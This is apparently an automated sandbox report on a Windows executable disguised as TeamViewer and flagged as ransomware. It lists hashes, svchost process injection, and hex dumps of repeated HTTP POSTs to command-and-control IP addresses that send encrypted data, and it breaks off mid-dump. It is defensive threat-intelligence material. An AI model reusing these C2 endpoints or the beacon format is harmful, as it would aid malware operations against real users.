Analysis Date2014-04-24 12:24:28
MD5923f77cfd44da85ab5c474e9ebfbea01
SHA1c9511a52771bd40ab4811423a2cab43e6f04c635

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 11d3429eb137ae7abd586f3cb638c23c sha1: f7274cbb96921c1373449011d372dd1428933cdd size: 95744
Section.adata md5: 8b79ce02198edc0cd32c29f4b97ff016 sha1: 895240ee87398164a282686a042776bc609f64d3 size: 13312
Section.data md5: c9ea411e5733be6c8cf1aafe99b3a963 sha1: 64de261bb89ce012c24745455103bca3fef8d0cb size: 47104
Section.rsrc md5: 8acc5e47faca790c54181c5b622c7053 sha1: 7be6fc3a02043309bced3b20672b6303c11a34fb size: 18432
Timestamp2014-04-14 11:12:16
VersionLegalCopyright: TeamViewer GmbH
InternalName: ny_turgerer
FileVersion: 4, 1, 0, 0
CompanyName: Zone Labs, LLC
ProductName: TeamViewer
ProductVersion: 4, 1, 0, 0
FileDescription: TeamViewer 9
OriginalFilename: tv_w32.exe
PackerSafeguard 1.03 -> Simonzh
PEhash2b6c2a59e5af5dd4d44fe5185cb3a7d3453c6d7f
IMPhash5a8596a800884e65c90b3c808d6108a7
AVmcafeeRDN/Ransom!ee
AVavgWin32/Cryptor

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\oarefbu.jnk

Network Details:

DNSgoogle.com
Type: A
173.194.34.174
DNSgoogle.com
Type: A
173.194.34.165
DNSgoogle.com
Type: A
173.194.34.166
DNSgoogle.com
Type: A
173.194.34.169
DNSgoogle.com
Type: A
173.194.34.168
DNSgoogle.com
Type: A
173.194.34.162
DNSgoogle.com
Type: A
173.194.34.161
DNSgoogle.com
Type: A
173.194.34.167
DNSgoogle.com
Type: A
173.194.34.163
DNSgoogle.com
Type: A
173.194.34.160
DNSgoogle.com
Type: A
173.194.34.164
HTTP POSThttp://92.143.228.82:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://193.253.48.206:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://80.15.119.65:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://92.143.228.82:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://90.34.115.251:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://193.253.48.206:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://178.202.232.201:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://80.15.119.65:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://79.169.179.216:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://90.34.115.251:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://80.15.172.29:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://178.202.232.201:33816/84339/ki6hpj8mcd/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 92.143.228.82:33816
Flows TCP192.168.1.1:1032 ➝ 193.253.48.206:33816
Flows TCP192.168.1.1:1033 ➝ 80.15.119.65:33816
Flows TCP192.168.1.1:1034 ➝ 92.143.228.82:33816
Flows TCP192.168.1.1:1035 ➝ 90.34.115.251:33816
Flows TCP192.168.1.1:1036 ➝ 193.253.48.206:33816
Flows TCP192.168.1.1:1037 ➝ 178.202.232.201:33816
Flows TCP192.168.1.1:1038 ➝ 80.15.119.65:33816
Flows TCP192.168.1.1:1039 ➝ 79.169.179.216:33816
Flows TCP192.168.1.1:1040 ➝ 90.34.115.251:33816
Flows TCP192.168.1.1:1041 ➝ 80.15.172.29:33816
Flows TCP192.168.1.1:1042 ➝ 178.202.232.201:33816

Raw Pcap
0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2039322e 3134332e 3232382e 38323a33    92.143.228.82:3
0x00000040 (00064)   33383136 0d0a436f 6e74656e 742d4c65   3816..Content-Le
0x00000050 (00080)   6e677468 3a203131 370d0a41 63636570   ngth: 117..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6465666c   t-Encoding: defl
0x00000070 (00112)   6174650d 0a436f6e 74656e74 2d547970   ate..Content-Typ
0x00000080 (00128)   653a2061 70706c69 63617469 6f6e2f78   e: application/x
0x00000090 (00144)   2d777777 2d666f72 6d2d7572 6c656e63   -www-form-urlenc
0x000000a0 (00160)   6f646564 0d0a5573 65722d41 67656e74   oded..User-Agent
0x000000b0 (00176)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x000000c0 (00192)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000d0 (00208)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000e0 (00224)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000f0 (00240)   4c522032 2e302e35 30373237 290d0a50   LR 2.0.50727)..P
0x00000100 (00256)   7261676d 613a206e 6f2d6361 6368650d   ragma: no-cache.
0x00000110 (00272)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000120 (00288)   6e6f2d63 61636865 0d0a436f 6e6e6563   no-cache..Connec
0x00000130 (00304)   74696f6e 3a20636c 6f73650d 0a0d0a66   tion: close....f
0x00000140 (00320)   696c656e 616d653d 6a747774 63742e79   ilename=jtwtct.y
0x00000150 (00336)   63652664 6174613d 7165bb33 dbe161f8   ce&data=qe.3..a.
0x00000160 (00352)   ec08154d c3ebefd2 e4cc73f0 a086f969   ...M......s....i
0x00000170 (00368)   130938f9 2d819020 11a51e6c 4e403ba6   ..8.-.. ...lN@;.
0x00000180 (00384)   bfe1f069 b587cac3 b54457d9 392ac75d   ...i.....DW.9*.]
0x00000190 (00400)   4999c971 1ec04c9f 8a9c253a eb62fca7   I..q..L...%:.b..
0x000001a0 (00416)   6cacea04 e0829ced 015202ca 472c2d48   l........R..G,-H
0x000001b0 (00432)   1f461806                              .F..

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   20313933 2e323533 2e34382e 3230363a    193.253.48.206:
0x00000040 (00064)   33333831 360d0a43 6f6e7465 6e742d4c   33816..Content-L
0x00000050 (00080)   656e6774 683a2031 31390d0a 41636365   ength: 119..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20646566   pt-Encoding: def
0x00000070 (00112)   6c617465 0d0a436f 6e74656e 742d5479   late..Content-Ty
0x00000080 (00128)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000090 (00144)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000a0 (00160)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000b0 (00176)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000c0 (00192)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000d0 (00208)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000e0 (00224)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000f0 (00240)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000100 (00256)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x00000110 (00272)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000120 (00288)   206e6f2d 63616368 650d0a43 6f6e6e65    no-cache..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)   66696c65 6e616d65 3d726173 6f72652e   filename=rasore.
0x00000150 (00336)   77757126 64617461 3dd1c72e d00cf26a   wuq&data=......j
0x00000160 (00352)   ef9740a6 80e23af2 da6a4c5a fb7f731c   ..@...:..jLZ..s.
0x00000170 (00368)   bff7751d 5680f97c 97a19327 db0e3b8a   ..u.V..|...'..;.
0x00000180 (00384)   05c01a62 6837e4a0 f5f435e7 0afd6ba0   ...bh7....5...k.
0x00000190 (00400)   0eec621a b76aed54 aa90f091 123cf8e3   ..b..j.T.....<..
0x000001a0 (00416)   c6a57772 7fb9995d f82da5e0 64fbff49   ..wr...].-..d..I
0x000001b0 (00432)   97b337eb 768b0d                       ..7.v..

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2038302e 31352e31 31392e36 353a3333    80.15.119.65:33
0x00000040 (00064)   3831360d 0a436f6e 74656e74 2d4c656e   816..Content-Len
0x00000050 (00080)   6774683a 20313233 0d0a4163 63657074   gth: 123..Accept
0x00000060 (00096)   2d456e63 6f64696e 673a2064 65666c61   -Encoding: defla
0x00000070 (00112)   74650d0a 436f6e74 656e742d 54797065   te..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000090 (00144)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000a0 (00160)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000b0 (00176)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000c0 (00192)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x000000d0 (00208)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000e0 (00224)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000f0 (00240)   5220322e 302e3530 37323729 0d0a5072   R 2.0.50727)..Pr
0x00000100 (00256)   61676d61 3a206e6f 2d636163 68650d0a   agma: no-cache..
0x00000110 (00272)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000120 (00288)   6f2d6361 6368650d 0a436f6e 6e656374   o-cache..Connect
0x00000130 (00304)   696f6e3a 20636c6f 73650d0a 0d0a6669   ion: close....fi
0x00000140 (00320)   6c656e61 6d653d6f 76706969 76622e66   lename=ovpiivb.f
0x00000150 (00336)   71702664 6174613d b7f4068d fe099147   qp&data=.......G
0x00000160 (00352)   1123615b ebaf25ed 045c6d5c 9042179b   .#a[..%..\m\.B..
0x00000170 (00368)   2334ec07 b39cf47b 9b9bbae3 09267ccc   #4.....{.....&|.
0x00000180 (00384)   4e4b1777 12544f31 c9d4a8d0 761385df   NK.w.TO1....v...
0x00000190 (00400)   48e62bb6 d9460478 a3a2e761 f1fe9559   H.+..F.x...a...Y
0x000001a0 (00416)   aad7f0a0 93c23c7c 28533d8b 9131d019   ......<|(S=..1..
0x000001b0 (00432)   c1bef85d 2930686f 7f                  ...])0ho.

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2039322e 3134332e 3232382e 38323a33    92.143.228.82:3
0x00000040 (00064)   33383136 0d0a436f 6e74656e 742d4c65   3816..Content-Le
0x00000050 (00080)   6e677468 3a203132 380d0a41 63636570   ngth: 128..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6465666c   t-Encoding: defl
0x00000070 (00112)   6174650d 0a436f6e 74656e74 2d547970   ate..Content-Typ
0x00000080 (00128)   653a2061 70706c69 63617469 6f6e2f78   e: application/x
0x00000090 (00144)   2d777777 2d666f72 6d2d7572 6c656e63   -www-form-urlenc
0x000000a0 (00160)   6f646564 0d0a5573 65722d41 67656e74   oded..User-Agent
0x000000b0 (00176)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x000000c0 (00192)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000d0 (00208)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000e0 (00224)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000f0 (00240)   4c522032 2e302e35 30373237 290d0a50   LR 2.0.50727)..P
0x00000100 (00256)   7261676d 613a206e 6f2d6361 6368650d   ragma: no-cache.
0x00000110 (00272)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000120 (00288)   6e6f2d63 61636865 0d0a436f 6e6e6563   no-cache..Connec
0x00000130 (00304)   74696f6e 3a20636c 6f73650d 0a0d0a66   tion: close....f
0x00000140 (00320)   696c656e 616d653d 66617578 7364662e   ilename=fauxsdf.
0x00000150 (00336)   737a6926 64617461 3d4ef292 4f5bd2cc   szi&data=N..O[..
0x00000160 (00352)   a0bb1496 3f6eaa65 4cc01b73 013a25db   ....?n.eL..s.:%.
0x00000170 (00368)   7644f079 6a5e12db 60937377 ed68a32b   vD.yj^..`.sw.h.+
0x00000180 (00384)   4e938886 280caa0f d3187403 f978179c   N...(.....t..x..
0x00000190 (00400)   9a823098 9c041207 5d3eecd4 d32ba8c1   ..0.....]>...+..
0x000001a0 (00416)   91c5be62 b190a0eb 63facaf4 a341e3a0   ...b....c....A..
0x000001b0 (00432)   6a5d6fc5 2d30e99f b24bb3da 1145c5     j]o.-0...K...E.

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2039302e 33342e31 31352e32 35313a33    90.34.115.251:3
0x00000040 (00064)   33383136 0d0a436f 6e74656e 742d4c65   3816..Content-Le
0x00000050 (00080)   6e677468 3a203132 350d0a41 63636570   ngth: 125..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6465666c   t-Encoding: defl
0x00000070 (00112)   6174650d 0a436f6e 74656e74 2d547970   ate..Content-Typ
0x00000080 (00128)   653a2061 70706c69 63617469 6f6e2f78   e: application/x
0x00000090 (00144)   2d777777 2d666f72 6d2d7572 6c656e63   -www-form-urlenc
0x000000a0 (00160)   6f646564 0d0a5573 65722d41 67656e74   oded..User-Agent
0x000000b0 (00176)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x000000c0 (00192)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000d0 (00208)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000e0 (00224)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000f0 (00240)   4c522032 2e302e35 30373237 290d0a50   LR 2.0.50727)..P
0x00000100 (00256)   7261676d 613a206e 6f2d6361 6368650d   ragma: no-cache.
0x00000110 (00272)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000120 (00288)   6e6f2d63 61636865 0d0a436f 6e6e6563   no-cache..Connec
0x00000130 (00304)   74696f6e 3a20636c 6f73650d 0a0d0a66   tion: close....f
0x00000140 (00320)   696c656e 616d653d 7a736861 2e757670   ilename=zsha.uvp
0x00000150 (00336)   26646174 613d7d23 2645642a 44b27605   &data=}#&Ed*D.v.
0x00000160 (00352)   4aa7c86f 8c2c92e3 d956787f 1c46f289   J..o.,...Vx..F..
0x00000170 (00368)   f345d4e3 361ff3ea d575f4e7 88517d71   .E..6....u...Q}q
0x00000180 (00384)   e9e8915e b9757ca6 8c814860 8bdc56c4   ...^.u|...H`..V.
0x00000190 (00400)   e411935c cff6e7e0 d52838c3 b756639f   ...\.....(8..Vc.
0x000001a0 (00416)   3c427df0 01fe7b86 1618f866 8b40e792   <B}...{....f.@..
0x000001b0 (00432)   7bf3933d 8660536f b46db5b6            {..=.`So.m..

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   20313933 2e323533 2e34382e 3230363a    193.253.48.206:
0x00000040 (00064)   33333831 360d0a43 6f6e7465 6e742d4c   33816..Content-L
0x00000050 (00080)   656e6774 683a2031 31370d0a 41636365   ength: 117..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20646566   pt-Encoding: def
0x00000070 (00112)   6c617465 0d0a436f 6e74656e 742d5479   late..Content-Ty
0x00000080 (00128)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000090 (00144)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000a0 (00160)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000b0 (00176)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000c0 (00192)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000d0 (00208)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000e0 (00224)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000f0 (00240)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000100 (00256)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x00000110 (00272)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000120 (00288)   206e6f2d 63616368 650d0a43 6f6e6e65    no-cache..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)   66696c65 6e616d65 3d727174 682e7767   filename=rqth.wg
0x00000150 (00336)   70266461 74613d81 e76963f9 f6edee     p&data=..ic....

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   20313738 2e323032 2e323332 2e323031    178.202.232.201
0x00000040 (00064)   3a333338 31360d0a 436f6e74 656e742d   :33816..Content-
0x00000050 (00080)   4c656e67 74683a20 3131340d 0a416363   Length: 114..Acc
0x00000060 (00096)   6570742d 456e636f 64696e67 3a206465   ept-Encoding: de
0x00000070 (00112)   666c6174 650d0a43 6f6e7465 6e742d54   flate..Content-T
0x00000080 (00128)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000090 (00144)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x000000a0 (00160)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000b0 (00176)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000c0 (00192)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000d0 (00208)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000e0 (00224)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000f0 (00240)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000100 (00256)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x00000110 (00272)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x00000120 (00288)   3a206e6f 2d636163 68650d0a 436f6e6e   : no-cache..Conn
0x00000130 (00304)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000140 (00320)   0a66696c 656e616d 653d6662 772e7778   .filename=fbw.wx
0x00000150 (00336)   65266461 74613dd3 33c2da54 de61dcfe   e&data=.3..T.a..
0x00000160 (00352)   81c76905 bc87b197 6eddc28d 5533cf62   ..i.....n...U3.b
0x00000170 (00368)   7f5ce220 9ab8e1e4 356baec9 1d6b1a9c   .\. ....5k...k..
0x00000180 (00384)   302a0db1 3c9a29f5 deb61fa2 9d6f0c1a   0*..<.)......o..
0x00000190 (00400)   4a94b2fd 81d32cdb 99e775d6 7fe435f4   J.....,...u...5.
0x000001a0 (00416)   33c22984 6b226a52 10f43933 a50583     3.).k"jR..93...

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2038302e 31352e31 31392e36 353a3333    80.15.119.65:33
0x00000040 (00064)   3831360d 0a436f6e 74656e74 2d4c656e   816..Content-Len
0x00000050 (00080)   6774683a 20313230 0d0a4163 63657074   gth: 120..Accept
0x00000060 (00096)   2d456e63 6f64696e 673a2064 65666c61   -Encoding: defla
0x00000070 (00112)   74650d0a 436f6e74 656e742d 54797065   te..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000090 (00144)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000a0 (00160)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000b0 (00176)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000c0 (00192)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x000000d0 (00208)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000e0 (00224)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000f0 (00240)   5220322e 302e3530 37323729 0d0a5072   R 2.0.50727)..Pr
0x00000100 (00256)   61676d61 3a206e6f 2d636163 68650d0a   agma: no-cache..
0x00000110 (00272)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000120 (00288)   6f2d6361 6368650d 0a436f6e 6e656374   o-cache..Connect
0x00000130 (00304)   696f6e3a 20636c6f 73650d0a 0d0a6669   ion: close....fi
0x00000140 (00320)   6c656e61 6d653d69 61616166 6f2e7a6c   lename=iaaafo.zl
0x00000150 (00336)   64266461 74613d92 e7d34895 3bf9cfd7   d&data=...H.;...
0x00000160 (00352)   9cb8a90c 06490ff7 19b2bef0 261eb467   .....I......&..g
0x00000170 (00368)   d6b7241e c1cf434f 2cbf5dda 7c8f7dc4   ..$...CO,.].|.}.
0x00000180 (00384)   4d40483d 7b22fbc5 e76c6697 7ad2c901   M@H={"...lf.z...
0x00000190 (00400)   d6146c66 31329e63 5b8baf99 ff981d32   ..lf12.c[......2
0x000001a0 (00416)   9fb2c457 2998906e 13730e38 1634e1ec   ...W)..n.s.8.4..
0x000001b0 (00432)   eab8831d f0c8e99f b24bb3da 1145c5     .........K...E.

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2037392e 3136392e 3137392e 3231363a    79.169.179.216:
0x00000040 (00064)   33333831 360d0a43 6f6e7465 6e742d4c   33816..Content-L
0x00000050 (00080)   656e6774 683a2031 33320d0a 41636365   ength: 132..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20646566   pt-Encoding: def
0x00000070 (00112)   6c617465 0d0a436f 6e74656e 742d5479   late..Content-Ty
0x00000080 (00128)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000090 (00144)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000a0 (00160)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000b0 (00176)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000c0 (00192)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000d0 (00208)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000e0 (00224)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000f0 (00240)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000100 (00256)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x00000110 (00272)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000120 (00288)   206e6f2d 63616368 650d0a43 6f6e6e65    no-cache..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)   66696c65 6e616d65 3d637773 732e6b6b   filename=cwss.kk
0x00000150 (00336)   75266461 74613d4d 6acfd2a2 cc1fac25   u&data=Mj......%
0x00000160 (00352)   5e056ee2 8883cae8 2b564bb5 6f2802bb   ^.n.....+VK.o(..
0x00000170 (00368)   7e35e9a5 6395fb71 2bfe55f6 5228c2eb   ~5..c..q+.U.R(..
0x00000180 (00384)   7b323672 fa06014e ea159662 1816156e   {26r...N...b...n
0x00000190 (00400)   82466e16 a1dc453f b2c476d5 0f5cc9fe   .Fn...E?..v..\..
0x000001a0 (00416)   8918a8ca 454b455f eef5d9b4 f68254f8   ....EKE_......T.
0x000001b0 (00432)   e312c76d 50a987b9 63                  ...mP...c

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2039302e 33342e31 31352e32 35313a33    90.34.115.251:3
0x00000040 (00064)   33383136 0d0a436f 6e74656e 742d4c65   3816..Content-Le
0x00000050 (00080)   6e677468 3a203131 370d0a41 63636570   ngth: 117..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6465666c   t-Encoding: defl
0x00000070 (00112)   6174650d 0a436f6e 74656e74 2d547970   ate..Content-Typ
0x00000080 (00128)   653a2061 70706c69 63617469 6f6e2f78   e: application/x
0x00000090 (00144)   2d777777 2d666f72 6d2d7572 6c656e63   -www-form-urlenc
0x000000a0 (00160)   6f646564 0d0a5573 65722d41 67656e74   oded..User-Agent
0x000000b0 (00176)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x000000c0 (00192)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000d0 (00208)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000e0 (00224)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000f0 (00240)   4c522032 2e302e35 30373237 290d0a50   LR 2.0.50727)..P
0x00000100 (00256)   7261676d 613a206e 6f2d6361 6368650d   ragma: no-cache.
0x00000110 (00272)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000120 (00288)   6e6f2d63 61636865 0d0a436f 6e6e6563   no-cache..Connec
0x00000130 (00304)   74696f6e 3a20636c 6f73650d 0a0d0a66   tion: close....f
0x00000140 (00320)   696c656e 616d653d 796e7476 692e7a72   ilename=yntvi.zr
0x00000150 (00336)   64266461 74613d11 56adb417 8f03da83   d&data=.V.......
0x00000160 (00352)   1e396299 43d3e223 dba33854 0fded548   .9b.C..#..8T...H
0x00000170 (00368)   a4ef259b 50e2fb63 d2aba5aa 2e2aa3cc   ..%.P..c.....*..
0x00000180 (00384)   880913d9 9aabe4fa 0346103d e865e737   .........F.=.e.7
0x00000190 (00400)   268a2787 da65e1dc da74b3ea 4eddabe8   &.'..e...t..N...
0x000001a0 (00416)   cba35791 096d718d 6a0bf9a3 10f8bad3   ..W..mq.j.......
0x000001b0 (00432)   8a50cf47 f0c8e99f b24bb3da 1145c5     .P.G.....K...E.

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   2038302e 31352e31 37322e32 393a3333    80.15.172.29:33
0x00000040 (00064)   3831360d 0a436f6e 74656e74 2d4c656e   816..Content-Len
0x00000050 (00080)   6774683a 20313330 0d0a4163 63657074   gth: 130..Accept
0x00000060 (00096)   2d456e63 6f64696e 673a2064 65666c61   -Encoding: defla
0x00000070 (00112)   74650d0a 436f6e74 656e742d 54797065   te..Content-Type
